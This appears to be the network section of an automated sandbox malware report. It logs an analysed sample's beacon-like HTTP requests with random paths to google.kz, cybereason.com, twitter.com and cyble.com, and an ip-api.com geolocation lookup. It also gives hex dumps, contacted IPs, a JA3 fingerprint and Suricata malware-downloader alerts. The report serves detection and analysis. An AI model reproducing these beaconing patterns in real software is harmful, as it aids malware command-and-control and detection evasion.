Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzData Raw: 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a Data Ascii: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzData Raw: 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a Data Ascii: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzData Raw: 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a Data Ascii: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzData Raw: 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a Data Ascii: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
Source: global traffic	HTTP traffic detected: GET /de2GhgMoGn?s=144 HTTP/1.1Host: cybereason.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
Source: global traffic	HTTP traffic detected: GET /line?fields=query,country HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzData Raw: 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a Data Ascii: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzData Raw: 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a Data Ascii: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
Source: global traffic	HTTP traffic detected: POST /8LRAjeh6l2?223=0 HTTP/1.1Host: blog.cyble.comContent-Length: 223Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /f10RkK61wN?197=0 HTTP/1.1Host: twitter.comContent-Length: 197Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
Source: global traffic	HTTP traffic detected: GET /5N5Gv78Z7d?s=194 HTTP/1.1Host: google.kz
Source: global traffic	HTTP traffic detected: GET /5N5Gv78Z7d?s=194 HTTP/1.1Host: google.kzConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /5N5Gv78Z7d?s=194 HTTP/1.1Host: google.kzConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 104.244.42.65 104.244.42.65
Source: Joe Sandbox View	IP Address: 104.244.42.129 104.244.42.129
Source: Joe Sandbox View	IP Address: 159.69.63.226 159.69.63.226

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: ip-api.com
Source: unknown	DNS query: name: ip-api.com

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.16:49757 -> 172.217.19.164:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.16:49762 -> 172.217.19.164:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.16:49751 -> 172.217.19.164:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.16:49730 -> 172.217.19.164:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.16:49729 -> 172.217.19.164:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.16:49723 -> 172.217.19.164:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.16:49724 -> 172.217.19.164:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.16:49752 -> 172.217.19.164:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.16:49761 -> 172.217.19.164:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.16:49756 -> 172.217.19.164:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.16:49773 -> 192.0.78.152:443

Source: unknown	TCP traffic detected without corresponding DNS query: 140.238.218.94
Source: unknown	TCP traffic detected without corresponding DNS query: 140.238.218.94
Source: unknown	TCP traffic detected without corresponding DNS query: 140.238.218.94
Source: unknown	TCP traffic detected without corresponding DNS query: 140.238.218.94
Source: unknown	TCP traffic detected without corresponding DNS query: 140.238.218.94
Source: unknown	TCP traffic detected without corresponding DNS query: 140.238.218.94
Source: unknown	TCP traffic detected without corresponding DNS query: 140.238.218.94
Source: unknown	TCP traffic detected without corresponding DNS query: 140.238.218.94
Source: unknown	TCP traffic detected without corresponding DNS query: 140.238.218.94
Source: unknown	TCP traffic detected without corresponding DNS query: 140.238.218.94
Source: unknown	TCP traffic detected without corresponding DNS query: 140.238.218.94
Source: unknown	TCP traffic detected without corresponding DNS query: 140.238.218.94
Source: unknown	TCP traffic detected without corresponding DNS query: 140.238.218.94
Source: unknown	TCP traffic detected without corresponding DNS query: 140.238.218.94
Source: unknown	TCP traffic detected without corresponding DNS query: 140.238.218.94
Source: unknown	TCP traffic detected without corresponding DNS query: 140.238.218.94
Source: unknown	TCP traffic detected without corresponding DNS query: 140.238.218.94
Source: unknown	TCP traffic detected without corresponding DNS query: 140.238.218.94
Source: unknown	TCP traffic detected without corresponding DNS query: 140.238.218.94
Source: unknown	TCP traffic detected without corresponding DNS query: 140.238.218.94
Source: unknown	TCP traffic detected without corresponding DNS query: 140.238.218.94
Source: unknown	TCP traffic detected without corresponding DNS query: 140.238.218.94
Source: unknown	TCP traffic detected without corresponding DNS query: 140.238.218.94
Source: unknown	TCP traffic detected without corresponding DNS query: 140.238.218.94
Source: unknown	TCP traffic detected without corresponding DNS query: 140.238.218.94
Source: unknown	TCP traffic detected without corresponding DNS query: 140.238.218.94
Source: unknown	TCP traffic detected without corresponding DNS query: 140.238.218.94
Source: unknown	TCP traffic detected without corresponding DNS query: 140.238.218.94
Source: unknown	TCP traffic detected without corresponding DNS query: 140.238.218.94
Source: unknown	TCP traffic detected without corresponding DNS query: 140.238.218.94
Source: unknown	TCP traffic detected without corresponding DNS query: 140.238.218.94
Source: unknown	TCP traffic detected without corresponding DNS query: 140.238.218.94
Source: unknown	TCP traffic detected without corresponding DNS query: 140.238.218.94
Source: unknown	TCP traffic detected without corresponding DNS query: 140.238.218.94
Source: unknown	TCP traffic detected without corresponding DNS query: 140.238.218.94
Source: unknown	TCP traffic detected without corresponding DNS query: 46.235.26.83
Source: unknown	TCP traffic detected without corresponding DNS query: 46.235.26.83
Source: unknown	TCP traffic detected without corresponding DNS query: 46.235.26.83
Source: unknown	TCP traffic detected without corresponding DNS query: 46.235.26.83
Source: unknown	TCP traffic detected without corresponding DNS query: 46.235.26.83
Source: unknown	TCP traffic detected without corresponding DNS query: 46.235.26.83
Source: unknown	TCP traffic detected without corresponding DNS query: 46.235.26.83
Source: unknown	TCP traffic detected without corresponding DNS query: 46.235.26.83
Source: unknown	TCP traffic detected without corresponding DNS query: 46.235.26.83
Source: unknown	TCP traffic detected without corresponding DNS query: 46.235.26.83
Source: unknown	TCP traffic detected without corresponding DNS query: 46.235.26.83
Source: unknown	TCP traffic detected without corresponding DNS query: 46.235.26.83
Source: unknown	TCP traffic detected without corresponding DNS query: 46.235.26.83
Source: unknown	TCP traffic detected without corresponding DNS query: 46.235.26.83
Source: unknown	TCP traffic detected without corresponding DNS query: 46.235.26.83

Source: global traffic	HTTP traffic detected: GET /f10RkK61wN?197=0 HTTP/1.1Host: twitter.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /blog?223=0 HTTP/1.1Host: cyble.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /f10RkK61wN?197=0 HTTP/1.1Host: x.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /blog/?223=0 HTTP/1.1Host: cyble.com
Source: global traffic	HTTP traffic detected: GET /fheJKe6dsz?s=164 HTTP/1.1Host: twitter.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /0My2dPrz2a?s=27 HTTP/1.1Host: twitter.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /oQJb3GUymA?s=13 HTTP/1.1Host: cybereason.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /oQJb3GUymA?s=13 HTTP/1.1Host: cybereason.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /de2GhgMoGn?s=144 HTTP/1.1Host: cybereason.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /de2GhgMoGn?s=144 HTTP/1.1Host: cybereason.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /0My2dPrz2a?s=27 HTTP/1.1Host: twitter.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzData Raw: 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a Data Ascii: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzData Raw: 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a Data Ascii: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line?fields=query,country HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /oQJb3GUymA?s=13 HTTP/1.1Host: cybereason.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /oQJb3GUymA?s=13 HTTP/1.1Host: cybereason.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /M82hfWR7nN?s=118 HTTP/1.1Host: google.kzConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /de2GhgMoGn?s=144 HTTP/1.1Host: cybereason.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /de2GhgMoGn?s=144 HTTP/1.1Host: cybereason.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /0My2dPrz2a?s=27 HTTP/1.1Host: twitter.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /de2GhgMoGn?s=144 HTTP/1.1Host: cybereason.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
